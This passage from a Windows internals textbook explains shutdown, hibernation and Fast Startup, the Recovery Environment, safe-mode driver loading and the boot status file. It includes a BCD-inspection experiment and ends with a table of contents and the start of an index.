Next, the Winlogon state machine calls ExitWindowsEx to have Csrss
terminate any COM processes that are part of the interactive user’s session.
At this point, all the processes in the interactive user’s session have been
terminated. Wininit next calls ExitWindowsEx, which this time executes
within the system process context. This causes Wininit to send a message to
the Csrss part of session 0, where the services live. Csrss then looks at all the
processes belonging to the system context and performs and sends the
WM_QUERYENDSESSION/ WM_ENDSESSION messages to GUI threads
(as before). Instead of sending CTRL_LOGOFF_EVENT, however, it sends
CTRL_SHUTDOWN_EVENT to console applications that have registered
control handlers. Note that the SCM is a console program that registers a
control handler. When it receives the shutdown request, it in turn sends the
service shutdown control message to all services that registered for shutdown
notification. For more details on service shutdown (such as the shutdown
timeout Csrss uses for the SCM), see the “Services” section in Chapter 10.
Although Csrss performs the same timeouts as when it was terminating the
user processes, it doesn’t display any dialog boxes and doesn’t kill any
processes. (The registry values for the system process timeouts are taken
from the default user profile.) These timeouts simply allow system processes
a chance to clean up and exit before the system shuts down. Therefore, many
system processes are in fact still running when the system shuts down, such
as Smss, Wininit, Services, and LSASS.
Once Csrss has finished its pass notifying system processes that the system
is shutting down, Wininit wakes up, waits 60 seconds for all sessions to be
destroyed, and then, if needed, invokes System Restore (at this stage no user
process is active in the system, so the restore application can process all the
needed files that may have been in use before). Wininit finishes the shutdown
process by shutting down LogonUi and calling the executive subsystem
function NtShutdownSystem. This function calls the function
PoSetSystemPowerState to orchestrate the shutdown of drivers and the rest of
the executive subsystems (Plug and Play manager, power manager,
executive, I/O manager, configuration manager, and memory manager).
For example, PoSetSystemPowerState calls the I/O manager to send
shutdown I/O packets to all device drivers that have requested shutdown
notification. This action gives device drivers a chance to perform any special
processing their device might require before Windows exits. The stacks of
worker threads are swapped in, the configuration manager flushes any
modified registry data to disk, and the memory manager writes all modified
pages containing file data back to their respective files. If the option to clear
the paging file at shutdown is enabled, the memory manager clears the
paging file at this time. The I/O manager is called a second time to inform the
file system drivers that the system is shutting down. System shutdown ends
in the power manager. The action the power manager takes depends on
whether the user specified a shutdown, a reboot, or a power down.
Modern apps all rely on the Windows Shutdown Interface (WSI) to
properly shut down the system. The WSI API still uses RPC to communicate
between processes and supports the grace period. The grace period is a
mechanism by which the user is informed of an incoming shutdown, before
the shutdown actually begins. This mechanism is used even in case the
system needs to install updates. Advapi32 uses WSI to communicate with
Wininit. Wininit queues a timer, which fires at the end of the grace period
and calls Winlogon to initialize the shutdown request. Winlogon calls
ExitWindowsEx, and the rest of the procedure is identical to the previous one.
All the UWP applications (and even the new Start menu) use the
ShutdownUX module to switch off the system. ShutdownUX manages the
power transitions for UWP applications and is linked against Advapi32.dll.
Hibernation and Fast Startup
To improve the system startup time, Windows 8 introduced a new feature
called Fast Startup (also known as hybrid boot). In previous Windows
editions, if the hardware supported the S4 system power-state (see Chapter 6
of Part 1 for further details about the power manager), Windows allowed the
user to put the system in Hibernation mode. To properly understand Fast
Startup, a complete description of the Hibernation process is needed.
When a user or an application calls SetSuspendState API, a worker item is
sent to the power manager. The worker item contains all the information
needed by the kernel to initialize the power state transition. The power
manager informs the prefetcher of the outstanding hibernation request and
waits for all its pending I/Os to complete. It then calls the
NtSetSystemPowerState kernel API.
NtSetSystemPowerState is the key function that orchestrates the entire
hibernation process. The routine checks that the caller token includes the
Shutdown privilege, synchronizes with the Plug and Play manager, Registry,
and power manager (in this way there is no risk that any other transactions
could interfere in the meantime), and cycles against all the loaded drivers,
sending an IRP_MN_QUERY_POWER Irp to each of them. In this way the
power manager informs each driver that a power operation is started, so the
driver’s devices must not start any more I/O operations or take any other
action that would prevent the successful completion of the hibernation
process. If one of the requests fails (perhaps a driver is in the middle of an
important I/O), the procedure is aborted.
The power manager uses an internal routine that modifies the system boot
configuration data (BCD) to enable the Windows Resume boot application,
which, as the name implies, attempts to resume the system after the
hibernation. (For further details, see the section “The Windows Boot
Manager” earlier in this chapter). The power manager:
■ Opens the BCD object used to boot the system and reads the
associated Windows Resume application GUID (stored in a special
unnamed BCD element that has the value 0x23000003).
■ Searches the Resume object in the BCD store, opens it, and checks its
description. Writes the device and path BCD elements, linking them
to the \Windows\System32\winresume.efi file located in the boot
disk, and propagates the boot settings from the main system BCD
object (like the boot debugger options). Finally, it adds the
hibernation file path and device descriptor into filepath and filedevice
BCD elements.
■ Updates the root Boot Manager BCD object: writes the resumeobject
BCD element with the GUID of the discovered Windows Resume
boot application, sets the resume element to 1, and, in case the
hibernation is used for Fast Startup, sets the hiberboot element to 1.
Next, the power manager flushes the BCD data to disk, calculates all the
physical memory ranges that need to be written into the hibernation file (a
complex operation not described here), and sends a new power IRP to each
driver (IRP_MN_SET_POWER function). This time the drivers must put their
device to sleep and don’t have the chance to fail the request and stop the
hibernation process. The system is now ready to hibernate, so the power
manager starts a “sleeper” thread that has the sole purpose of powering the
machine down. It then waits for an event that will be signaled only when the
resume is completed (and the system is restarted by the user).
The sleeper thread halts all the CPUs (through DPC routines) except its
own, captures the system time, disables interrupts, and saves the CPU state. It
finally invokes the power state handler routine (implemented in the HAL),
which executes the ACPI machine code needed to put the entire system to
sleep and calls the routine that actually writes all the physical memory pages
to disk. The sleeper thread uses the crash dump storage driver to emit the
needed low-level disk I/Os for writing the data in the hibernation file.
The Windows Boot Manager, in its earlier boot stages, recognizes the
resume BCD element (stored in the Boot Manager BCD descriptor), opens
the Windows Resume boot application BCD object, and reads the saved
hibernation data. Finally, it transfers the execution to the Windows Resume
boot application (Winresume.efi). HbMain, the entry point routine of
Winresume, reinitializes the boot library and performs different checks on
the hibernation file:
■ Verifies that the file has been written by the same executing processor
architecture
■ Checks whether a valid page file exists and has the correct size
■ Checks whether the firmware has reported some hardware
configuration changes (through the FADT and FACS ACPI tables)
■ Checks the hibernation file integrity
If one of these checks fails, Winresume ends the execution and returns
control to the Boot Manager, which discards the hibernation file and restarts
a standard cold boot. On the other hand, if all the previous checks pass,
Winresume reads the hibernation file (using the UEFI boot library) and
restores all the saved physical pages contents. Next, it rebuilds the needed
page tables and memory data structures, copies the needed information to the
OS context, and finally transfers the execution to the Windows kernel,
restoring the original CPU context. The Windows kernel code restarts from
the same power manager sleeper thread that originally hibernated the system.
The power manager reenables interrupts and thaws all the other system
CPUs. It then updates the system time, reading it from the CMOS, rebases all
the system timers (and watchdogs), and sends another
IRP_MN_SET_POWER Irp to each system driver, asking them to restart their
devices. It finally restarts the prefetcher and sends it the boot loader log for
further processing. The system is now fully functional; the system power
state is S0 (fully on).
Fast Startup is a technology that’s implemented using hibernation. When
an application passes the EWX_HYBRID_SHUTDOWN flag to the
ExitWindowsEx API or when a user clicks the Shutdown start menu button, if
the system supports the S4 (hibernation) power state and has a hibernation
file enabled, it starts a hybrid shutdown. After Csrss has switched off all the
interactive session processes, session 0 services, and COM servers (see the
”Shutdown” section for all the details about the actual shutdown process),
Winlogon detects that the shutdown request has the Hybrid flag set, and,
instead of waking up the shutdown code of Winint, it goes into a different
route. The new Winlogon state uses the NtPowerInformation system API to
switch off the monitor; it next informs LogonUI about the outstanding hybrid
shutdown, and finally calls the NtInitializePowerAction API, asking for a
system hibernation. The procedure from now on is the same as the system
hibernation.
EXPERIMENT: Understanding hybrid shutdown
You can see the effects of a hybrid shutdown by manually
mounting the BCD store after the system has been switched off,
using an external OS. First, make sure that your system has Fast
Startup enabled. To do this, type Control Panel in the Start menu
search box, select System and Security, and then select Power
Options. After clicking Choose What The Power Button does,
located in the upper-left side of the Power Options window, the
following screen should appear:
As shown in the figure, make sure that the Turn On Fast
Startup option is selected. Otherwise, your system will perform a
standard shutdown. You can shut down your workstation using the
power button located in the left side of the Start menu. Before the
computer shuts down, you should insert a DVD or USB flash drive
that contains the external OS (a copy of a live Linux should work
well). For this experiment, you can’t use the Windows Setup
Program (or any WinRE based environments) because the setup
procedure clears all the hibernation data before mounting the
system volume.
When you switch on the workstation, perform the boot from an
external DVD or USB drive. This procedure varies between
different PC manufacturers and usually requires accessing the
BIOS interface. For instructions on accessing the BIOS and
performing the boot from an external drive, check your
workstation’s user manual. (For example, in the Surface Pro and
Surface Book laptops, usually it’s sufficient to press and hold the
Volume Up button before pushing and releasing the Power button
for entering the BIOS configuration.) When the new OS is ready,
mount the main UEFI system partition with a partitioning tool
(depending on the OS type). We don’t describe this procedure.
After the system partition has been correctly mounted, copy the
system Boot Configuration Data file, located in
\EFI\Microsoft\Boot\BCD, to an external drive (or in the same
USB flash drive used for booting). Then you can restart your PC
and wait for Windows to resume from hibernation.
After your PC restarts, run the Registry Editor and open the root
HKEY_LOCAL_MACHINE registry key. Then from the File menu,
select Load Hive. Browse for your saved BCD file, select Open,
and assign the BCD key name for the new loaded hive. Now you
should identify the main Boot Manager BCD object. In all
Windows systems, this root BCD object has the {9DEA862C-
5CDD-4E70-ACC1-F32B344D4795} GUID. Open the relative key
and its Elements subkey. If the system has been correctly switched
off with a hybrid shutdown, you should see the resume and
hiberboot BCD elements (the corresponding keys names are
26000005 and 26000025; see Table 12-2 for further details) with
their Element registry value set to 1.
To properly locate the BCD element that corresponds to your
Windows Installation, use the displayorder element (key named
24000001), which lists all the installed OS boot entries. In the
Element registry value, there is a list of all the GUIDs of the BCD
objects that describe the installed operating systems loaders. Check
the BCD object that describes the Windows Resume application,
reading the GUID value of the resumeobject BCD element (which
corresponds to the 23000006 key). The BCD object with this
GUID includes the hibernation file path into the filepath element,
which corresponds to the key named 22000002.
Windows Recovery Environment (WinRE)
The Windows Recovery Environment provides an assortment of tools and
automated repair technologies to fix the most common startup problems. It
includes six main tools:
■ System Restore Allows restoring to a previous restore point in cases
in which you can’t boot the Windows installation to do so, even in
safe mode.
■ System Image Recover Called Complete PC Restore or Automated
System Recovery (ASR) in previous versions of Windows, this
restores a Windows installation from a complete backup, not just from
a system restore point, which might not contain all damaged files and
lost data.
■ Startup Repair An automated tool that detects the most common
Windows startup problems and automatically attempts to repair them.
■ PC Reset A tool that removes all the applications and drivers that
don’t belong to the standard Windows installation, restores all the
settings to their default, and brings back Windows to its original state
after the installation. The user can choose to maintain all personal data
files or remove everything. In the latter case, Windows will be
automatically reinstalled from scratch.
■ Command Prompt For cases where troubleshooting or repair
requires manual intervention (such as copying files from another drive
or manipulating the BCD), you can use the command prompt to have
a full Windows shell that can launch almost any Windows program
(as long as the required dependencies can be satisfied)—unlike the
Recovery Console on earlier versions of Windows, which only
supported a limited set of specialized commands.
■ Windows Memory Diagnostic Tool Performs memory diagnostic
tests that check for signs of faulty RAM. Faulty RAM can be the
reason for random kernel and application crashes and erratic system
behavior.
When you boot a system from the Windows DVD or boot disks, Windows
Setup gives you the choice of installing Windows or repairing an existing
installation. If you choose to repair an installation, the system displays a
screen similar to the modern boot menu (shown in Figure 12-15), which
provides different choices.
The user can select to boot from another device, use a different OS (if
correctly registered in the system BCD store), or choose a recovery tool. All
the described recovery tools (except for the Memory Diagnostic Tool) are
located in the Troubleshoot section.
Figure 12-15 The Windows Recovery Environment startup screen.
The Windows setup application also installs WinRE to a recovery partition
on a clean system installation. You can access WinRE by keeping the Shift
key pressed when rebooting the computer through the relative shutdown
button located in the Start menu. If the system uses the Legacy Boot menu,
WinRE can be started using the F8 key to access advanced boot options
during Bootmgr execution. If you see the Repair Your Computer option, your
machine has a local hard disk copy. Additionally, if your system failed to
boot as the result of damaged files or for any other reason that Winload can
understand, it instructs Bootmgr to automatically start WinRE at the next
reboot cycle. Instead of the dialog box shown in Figure 12-15, the recovery
environment automatically launches the Startup Repair tool, shown in Figure
12-16.
Figure 12-16 The Startup Recovery tool.
At the end of the scan and repair cycle, the tool automatically attempts to
fix any damage found, including replacing system files from the installation
media. If the Startup Repair tool cannot automatically fix the damage, you
get a chance to try other methods, and the System Recovery Options dialog
box is displayed again.
The Windows Memory Diagnostics Tool can be launched from a working
system or from a Command Prompt opened in WinRE using the mdsched.exe
executable. The tool asks the user if they want to reboot the computer to run
the test. If the system uses the Legacy Boot menu, the Memory Diagnostics
Tool can be executed using the Tab key to navigate to the Tools section.
Safe mode
Perhaps the most common reason Windows systems become unbootable is
that a device driver crashes the machine during the boot sequence. Because
software or hardware configurations can change over time, latent bugs can
surface in drivers at any time. Windows offers a way for an administrator to
attack the problem: booting in safe mode. Safe mode is a boot configuration
that consists of the minimal set of device drivers and services. By relying on
only the drivers and services that are necessary for booting, Windows avoids
loading third-party and other nonessential drivers that might crash.
There are different ways to enter safe mode:
■ Boot the system in WinRE and select Startup Settings in the
Advanced options (see Figure 12-17).
Figure 12-17 The Startup Settings screen, in which the user can select
three different kinds of safe mode.
■ In multi-boot environments, select Change Defaults Or Choose
Other Options in the modern boot menu and go to the Troubleshoot
section to select the Startup Settings button as in the previous case.
■ If your system uses the Legacy Boot menu, press the F8 key to enter
the Advanced Boot Options menu.
You typically choose from three safe-mode variations: Safe mode, Safe
mode with networking, and Safe mode with command prompt. Standard safe
mode includes the minimum number of device drivers and services necessary
to boot successfully. Networking-enabled safe mode adds network drivers
and services to the drivers and services that standard safe mode includes.
Finally, safe mode with command prompt is identical to standard safe mode
except that Windows runs the Command Prompt application (Cmd.exe)
instead of Windows Explorer as the shell when the system enables GUI
mode.
Windows includes a fourth safe mode—Directory Services Restore mode
—which is different from the standard and networking-enabled safe modes.
You use Directory Services Restore mode to boot the system into a mode
where the Active Directory service of a domain controller is offline and
unopened. This allows you to perform repair operations on the database or
restore it from backup media. All drivers and services, with the exception of
the Active Directory service, load during a Directory Services Restore mode
boot. In cases when you can’t log on to a system because of Active Directory
database corruption, this mode enables you to repair the corruption.
Driver loading in safe mode
How does Windows know which device drivers and services are part of
standard and networking-enabled safe mode? The answer lies in the
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot registry key. This key
contains the Minimal and Network subkeys. Each subkey contains more
subkeys that specify the names of device drivers or services or of groups of
drivers. For example, the BasicDisplay.sys subkey identifies the Basic
display device driver that the startup configuration includes. The Basic
display driver provides basic graphics services for any PC-compatible display
adapter. The system uses this driver as the safe-mode display driver in lieu of
a driver that might take advantage of an adapter’s advanced hardware
features but that might also prevent the system from booting. Each subkey
under the SafeBoot key has a default value that describes what the subkey
identifies; the BasicDisplay.sys subkey’s default value is Driver.
The Boot file system subkey has as its default value Driver Group. When
developers design a device driver’s installation script (.inf file), they can
specify that the device driver belongs to a driver group. The driver groups
that a system defines are listed in the List value of the
HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder key. A
developer specifies a driver as a member of a group to indicate to Windows
at what point during the boot process the driver should start. The
ServiceGroupOrder key’s primary purpose is to define the order in which
driver groups load; some driver types must load either before or after other
driver types. The Group value beneath a driver’s configuration registry key
associates the driver with a group.
Driver and service configuration keys reside beneath
HKLM\SYSTEM\CurrentControlSet\Services. If you look under this key,
you’ll find the BasicDisplay key for the basic display device driver, which
you can see in the registry is a member of the Video group. Any file system
drivers that Windows requires for access to the Windows system drive are
automatically loaded as if part of the Boot file system group. Other file
system drivers are part of the File System group, which the standard and
networking-enabled safe-mode configurations also include.
When you boot into a safe-mode configuration, the boot loader (Winload)
passes an associated switch to the kernel (Ntoskrnl.exe) as a command-line
parameter, along with any switches you’ve specified in the BCD for the
installation you’re booting. If you boot into any safe mode, Winload sets the
safeboot BCD option with a value describing the type of safe mode you
select. For standard safe mode, Winload sets minimal, and for networking-
enabled safe mode, it adds network. Winload adds minimal and sets
alternateshell for safe mode with command prompt and dsrepair for
Directory Services Restore mode.
Note
An exception exists regarding the drivers that safe mode excludes from a
boot. Winload, rather than the kernel, loads any drivers with a Start value
of 0 in their registry key, which specifies loading the drivers at boot time.
Winload doesn’t check the SafeBoot registry key because it assumes that
any driver with a Start value of 0 is required for the system to boot
successfully. Because Winload doesn’t check the SafeBoot registry key to
identify which drivers to load, Winload loads all boot-start drivers (and
later Ntoskrnl starts them).
The Windows kernel scans the boot parameters in search of the safe-mode
switches at the end of phase 1 of the boot process
(Phase1InitializationDiscard, see the “Kernel initialization phase 1” section
earlier in this chapter), and sets the internal variable InitSafeBootMode to a
value that reflects the switches it finds. During the InitSafeBoot function, the
kernel writes the InitSafeBootMode value to the registry value
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option\OptionValue
so that user-mode components, such as the SCM, can determine what boot
mode the system is in. In addition, if the system is booting in safe mode with
command prompt, the kernel sets the HKLM\SYSTEM\CurrentControlSet\
Control\SafeBoot\ Option\UseAlternateShell value to 1. The kernel records
the parameters that Winload passes to it in the value
HKLM\SYSTEM\CurrentControlSet\Control\SystemStartOptions.
When the I/O manager kernel subsystem loads device drivers that
HKLM\SYSTEM\CurrentControlSet\Services specifies, the I/O manager
executes the function IopLoadDriver. When the Plug and Play manager
detects a new device and wants to dynamically load the device driver for the
detected device, the Plug and Play manager executes the function
PipCallDriverAddDevice. Both these functions call the function
IopSafebootDriverLoad before they load the driver in question.
IopSafebootDriverLoad checks the value of InitSafeBootMode and
determines whether the driver should load. For example, if the system boots
in standard safe mode, IopSafebootDriverLoad looks for the driver’s group,
if the driver has one, under the Minimal subkey. If IopSafebootDriverLoad
finds the driver’s group listed, IopSafebootDriverLoad indicates to its caller
that the driver can load. Otherwise, IopSafebootDriverLoad looks for the
driver’s name under the Minimal subkey. If the driver’s name is listed as a
subkey, the driver can load. If IopSafebootDriverLoad can’t find the driver
group or driver name subkeys, the driver will not be loaded. If the system
boots in networking-enabled safe mode, IopSafebootDriverLoad performs
the searches on the Network subkey. If the system doesn’t boot in safe mode,
IopSafebootDriverLoad lets all drivers load.
Safe-mode-aware user programs
When the SCM user-mode component (which Services.exe implements)
initializes during the boot process, the SCM checks the value of
HKLM\SYSTEM\CurrentControlSet\ Control\SafeBoot\Option\OptionValue
to determine whether the system is performing a safe-mode boot. If so, the
SCM mirrors the actions of IopSafebootDriverLoad. Although the SCM
processes the services listed under
HKLM\SYSTEM\CurrentControlSet\Services, it loads only services that the
appropriate safe-mode subkey specifies by name. You can find more
information on the SCM initialization process in the section “Services” in
Chapter 10.
Userinit, the component that initializes a user’s environment when the user
logs on (%SystemRoot%\System32\Userinit.exe), is another user-mode
component that needs to know whether the system is booting in safe mode. It
checks the value of HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\
Option\UseAlternateShell. If this value is set, Userinit runs the program
specified as the user’s shell in the value
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell rather
than executing Explorer.exe. Windows writes the program name Cmd.exe to
the AlternateShell value during installation, making the Windows command
prompt the default shell for safe mode with command prompt. Even though
the command prompt is the shell, you can type Explorer.exe at the command
prompt to start Windows Explorer, and you can run any other GUI program
from the command prompt as well.
How does an application determine whether the system is booting in safe
mode? By calling the Windows GetSystemMetrics(SM_CLEANBOOT)
function. Batch scripts that need to perform certain operations when the
system boots in safe mode look for the SAFEBOOT_OPTION environment
variable because the system defines this environment variable only when
booting in safe mode.
Boot status file
Windows uses a boot status file (%SystemRoot%\Bootstat.dat) to record the
fact that it has progressed through various stages of the system life cycle,
including boot and shutdown. This allows the Boot Manager, Windows
loader, and Startup Repair tool to detect abnormal shutdown or a failure to
shut down cleanly and offer the user recovery and diagnostic boot options,
like the Windows Recovery environment. This binary file contains
information through which the system reports the success of the following
phases of the system life cycle:
■ Boot
■ Shutdown and hybrid shutdown
■ Resume from hibernate or suspend
The boot status file also indicates whether a problem was detected the last
time the user attempted to boot the operating system and the recovery options
shown, indicating that the user has been made aware of the problem and
taken action. Runtime Library APIs (Rtl) in Ntdll.dll contain the private
interfaces that Windows uses to read from and write to the file. Like the
BCD, it cannot be edited by users.
Conclusion
In this chapter, we examined the detailed steps involved in starting and
shutting down Windows (both normally and in error cases). A lot of new
security technologies have been designed and implemented with the goal of
keeping the system safe even in its earlier startup stages and rendering it
immune from a variety of external attacks. We examined the overall structure
of Windows and the core system mechanisms that get the system going, keep
it running, and eventually shut it down, even in a fast way.
APPENDIX
Contents of Windows Internals,
Seventh Edition, Part 1
Introduction
Chapter 1 Concepts and tools
Windows operating system versions
Windows 10 and future Windows versions
Windows 10 and OneCore
Foundation concepts and terms
Windows API
Services, functions, and routines
Processes
Threads
Jobs
Virtual memory
Kernel mode vs. user mode
Hypervisor
Firmware
Terminal Services and multiple sessions
Objects and handles
Security
Registry
Unicode
Digging into Windows internals
Performance Monitor and Resource Monitor
Kernel debugging
Windows Software Development Kit
Windows Driver Kit
Sysinternals tools
Conclusion
Chapter 2 System architecture
Requirements and design goals
Operating system model
Architecture overview
Portability
Symmetric multiprocessing
Scalability
Differences between client and server versions
Checked build
Virtualization-based security architecture overview
Key system components
Environment subsystems and subsystem DLLs
Other subsystems
Executive
Kernel
Hardware abstraction layer
Device drivers
System processes
Conclusion
Chapter 3 Processes and jobs 101
Creating a process
CreateProcess* functions arguments
Creating Windows modern processes
Creating other kinds of processes
Process internals
Protected processes
Protected Process Light (PPL)
Third-party PPL support
Minimal and Pico processes
Minimal processes
Pico processes
Trustlets (secure processes)
Trustlet structure
Trustlet policy metadata
Trustlet attributes
System built-in Trustlets
Trustlet identity
Isolated user-mode services
Trustlet-accessible system calls
Flow of CreateProcess
Stage 1: Converting and validating parameters and flags
Stage 2: Opening the image to be executed
Stage 3: Creating the Windows executive process object
Stage 4: Creating the initial thread and its stack and context
Stage 5: Performing Windows subsystem–specific
initialization
Stage 6: Starting execution of the initial thread
Stage 7: Performing process initialization in the context of
the new process
Terminating a process
Image loader
Early process initialization
DLL name resolution and redirection
Loaded module database
Import parsing
Post-import process initialization
SwitchBack
API Sets
Jobs
Job limits
Working with a job
Nested jobs
Windows containers (server silos)
Conclusion
Chapter 4 Threads
Creating threads
Thread internals
Data structures
Birth of a thread
Examining thread activity
Limitations on protected process threads
Thread scheduling
Overview of Windows scheduling
Priority levels
Thread states
Dispatcher database
Quantum
Priority boosts
Context switching
Scheduling scenarios
Idle threads
Thread suspension
(Deep) freeze
Thread selection
Multiprocessor systems
Thread selection on multiprocessor systems
Processor selection
Heterogeneous scheduling (big.LITTLE)
Group-based scheduling
Dynamic fair share scheduling
CPU rate limits
Dynamic processor addition and replacement
Worker factories (thread pools)
Worker factory creation
Conclusion
Chapter 5 Memory management
Introduction to the memory manager
Memory manager components
Large and small pages
Examining memory usage
Internal synchronization
Services provided by the memory manager
Page states and memory allocations
Commit charge and commit limit
Locking memory
Allocation granularity
Shared memory and mapped files
Protecting memory
Data Execution Prevention
Copy-on-write
Address Windowing Extensions
Kernel-mode heaps (system memory pools)
Pool sizes
Monitoring pool usage
Look-aside lists
Heap manager
Process heaps
Heap types
The NT heap
Heap synchronization
The low-fragmentation heap
The segment heap
Heap security features
Heap debugging features
Pageheap
Fault-tolerant heap
Virtual address space layouts
x86 address space layouts
x86 system address space layout
x86 session space
System page table entries
ARM address space layout
64-bit address space layout
x64 virtual addressing limitations
Dynamic system virtual address space management
System virtual address space quotas
User address space layout
Address translation
x86 virtual address translation
Translation look-aside buffer
x64 virtual address translation
ARM virtual address translation
Page fault handling
Invalid PTEs
Prototype PTEs
In-paging I/O
Collided page faults
Clustered page faults
Page files
Commit charge and the system commit limit
Commit charge and page file size
Stacks
User stacks
Kernel stacks
DPC stack
Virtual address descriptors
Process VADs
Rotate VADs
NUMA
Section objects
Working sets
Demand paging
Logical prefetcher and ReadyBoot
Placement policy
Working set management
Balance set manager and swapper
System working sets
Memory notification events
Page frame number database
Page list dynamics
Page priority
Modified page writer and mapped page writer
PFN data structures
Page file reservation
Physical memory limits
Windows client memory limits
Memory compression
Compression illustration
Compression architecture
Memory partitions
Memory combining
The search phase
The classification phase
The page combining phase
From private to shared PTE
Combined pages release
Memory enclaves
Programmatic interface
Memory enclave initializations
Enclave construction
Loading data into an enclave
Initializing an enclave
Proactive memory management (SuperFetch)
Components
Tracing and logging
Scenarios
Page priority and rebalancing
Robust performance
ReadyBoost
ReadyDrive
Process reflection
Conclusion
Chapter 6 I/O system 483
I/O system components
The I/O manager
Typical I/O processing
Interrupt Request Levels and Deferred Procedure Calls
Interrupt Request Levels
Deferred Procedure Calls
Device drivers
Types of device drivers
Structure of a driver
Driver objects and device objects
Opening devices
I/O processing
Types of I/O
I/O request packets
I/O request to a single-layered hardware-based driver
I/O requests to layered drivers
Thread-agnostic I/O
I/O cancellation
I/O completion ports
I/O prioritization
Container notifications
Driver Verifier
I/O-related verification options
Memory-related verification options
The Plug and Play manager
Level of Plug and Play support
Device enumeration
Device stacks
Driver support for Plug and Play
Plug-and-play driver installation
General driver loading and installation
Driver loading
Driver installation
The Windows Driver Foundation
Kernel-Mode Driver Framework
User-Mode Driver Framework
The power manager
Connected Standby and Modern Standby
Power manager operation
Driver power operation
Driver and application control of device power
Power management framework
Power availability requests
Conclusion
Chapter 7 Security
Security ratings
Trusted Computer System Evaluation Criteria
The Common Criteria
Security system components
Virtualization-based security
Credential Guard
Device Guard
Protecting objects
Access checks
Security identifiers
Virtual service accounts
Security descriptors and access control
Dynamic Access Control
The AuthZ API
Conditional ACEs
Account rights and privileges
Account rights
Privileges
Super privileges
Access tokens of processes and threads
Security auditing
Object access auditing
Global audit policy
Advanced Audit Policy settings
AppContainers
Overview of UWP apps
The AppContainer
Logon
Winlogon initialization
User logon steps
Assured authentication
Windows Biometric Framework
Windows Hello
User Account Control and virtualization
File system and registry virtualization
Elevation
Exploit mitigations
Process-mitigation policies
Control Flow Integrity
Security assertions
Application Identification
AppLocker
Software Restriction Policies
Kernel Patch Protection
PatchGuard
HyperGuard
Conclusion
Index
Index
SYMBOLS
\ (root directory), 692
NUMBERS
32-bit handle table entry, 147
64-bit IDT, viewing, 34–35
A
AAM (Application Activation Manager), 244
ACL (access control list), displaying, 153–154
ACM (authenticated code module), 805–806
!acpiirqarb command, 49
ActivationObject object, 129
ActivityReference object, 129
address-based pushlocks, 201
address-based waits, 202–203
ADK (Windows Assessment and Deployment Kit), 421
administrative command prompt, opening, 253, 261
AeDebug and AeDebugProtected root keys, WER (Windows Error
Reporting), 540
AES (Advanced Encryption Standard), 711
allocators, ReFS (Resilient File System), 743–745
ALPC (Advanced Local Procedure Call), 209
!alpc command, 224
ALPC message types, 211
ALPC ports, 129, 212–214
ALPC worker thread, 118
APC level, 40, 43, 62, 63, 65
!apciirqarb command, 48
APCs (asynchronous procedure calls), 61–66
APIC, and PIC (Programmable Interrupt Controller), 37–38
APIC (Advanced Programmable Interrupt Controller), 35–36
!apic command, 37
APIC Timer, 67
APIs, 690
\AppContainer NamedObjects directory, 160
AppContainers, 243–244
AppExecution aliases, 263–264
apps, activating through command line, 261–262. See also packaged
applications
APT (Advanced Persistent Threats), 781
!arbiter command, 48
architectural system service dispatching, 92–95
\ArcName directory, 160
ARM32 simulation on ARM 64 platforms, 115
assembly code, 2
associative cache, 13
atomic execution, 207
attributes, resident and nonresident, 667–670
auto-expand pushlocks, 201
Autoruns tool, 837
autostart services startup, 451–457
AWE (Address Windowing Extension), 201
B
B+ Tree physical layout, ReFS (Resilient File System), 742–743
background tasks and Broker Infrastructure, 256–258
Background Broker Infrastructure, 244, 256–258
backing up encrypted files, 716–717
bad-cluster recovery, NTFS recovery support, 703–706. See also clusters
bad-cluster remapping, NTFS, 633
base named objects, looking at, 163–164. See also objects
\BaseNamedObjects directory, 160
BCD (Boot Configuration Database), 392, 398–399
BCD library for boot operations, 790–792
BCD options
Windows hypervisor loader (Hvloader), 796–797
Windows OS Loader, 792–796
bcdedit command, 398–399
BI (Background Broker Infrastructure), 244, 256–258
BI (Broker Infrastructure), 238
BindFlt (Windows Bind minifilter driver), 248
BitLocker
encryption offload, 717–718
recovery procedure, 801
turning on, 804
block volumes, DAX (Direct Access Disks), 728–730
BNO (Base Named Object) Isolation, 167
BOOLEAN status, 208
boot application, launching, 800–801
Boot Manager
BCD objects, 798
overview, 785–799
and trusted execution, 805
boot menu, 799–800
boot process. See also Modern boot menu
BIOS, 781
driver loading in safe mode, 848–849
hibernation and Fast Startup, 840–844
hypervisor loader, 811–813
images start automatically, 837
kernel and executive subsystems, 818–824
kernel initialization phase 1, 824–829
Measured Boot, 801–805
ReadyBoot, 835–836
safe mode, 847–850
Secure Boot, 781–784
Secure Launch, 816–818
shutdown, 837–840
Smss, Csrss, Wininit, 830–835
trusted execution, 805–807
UEFI, 777–781
VSM (Virtual Secure Mode) startup policy, 813–816
Windows OS Loader, 808–810
WinRE (Windows Recovery Environment), 845
boot status file, 850
Bootim.exe command, 832
booting from iSCSI, 811
BPB (boot parameter block), 657
BTB (Branch Target Buffer), 11
bugcheck, 40
C
C-states and timers, 76
cache
copying to and from, 584
forcing to write through to disk, 595
cache coherency, 568–569
cache data structures, 576–582
cache manager
in action, 591–594
centralized system cache, 567
disk I/O accounting, 600–601
features, 566–567
lazy writer, 622
mapping views of files, 573
memory manager, 567
memory partitions support, 571–572
NTFS MFT working set enhancements, 571
read-ahead thread, 622–623
recoverable file system support, 570
stream-based caching, 569
virtual block caching, 569
write-back cache with lazy write, 589
cache size, 574–576
cache virtual memory management, 572–573
cache-aware pushlocks, 200–201
caches and storage memory, 10
caching
with DMA (direct memory access) interfaces, 584–585
with mapping and pinning interfaces, 584
caching and file systems
disks, 565
partitions, 565
sectors, 565
volumes, 565–566
\Callback directory, 160
cd command, 144, 832
CDFS legacy format, 602
CEA (Common Event Aggregator), 238
Centennial applications, 246–249, 261
CFG (Control Flow Integrity), 343
Chain of Trust, 783–784
change journal file, NTFS on-disk structure, 675–679
change logging, NTFS, 637–638
check-disk and fast repair, NTFS recovery support, 707–710
checkpoint records, NTFS recovery support, 698
!chksvctbl command, 103
CHPE (Compile Hybrid Executable) bitmap, 115–118
CIM (Common Information Model), WMI (Windows Management
Instrumentation), 488–495
CLFS (common logging file system), 403–404
Clipboard User Service, 472
clock time, 57
cloning ReFS files, 755
Close method, 141
clusters. See also bad-cluster recovery
defined, 566
NTFS on-disk structure, 655–656
cmd command, 253, 261, 275, 289, 312, 526, 832
COM-hosted task, 479, 484–486
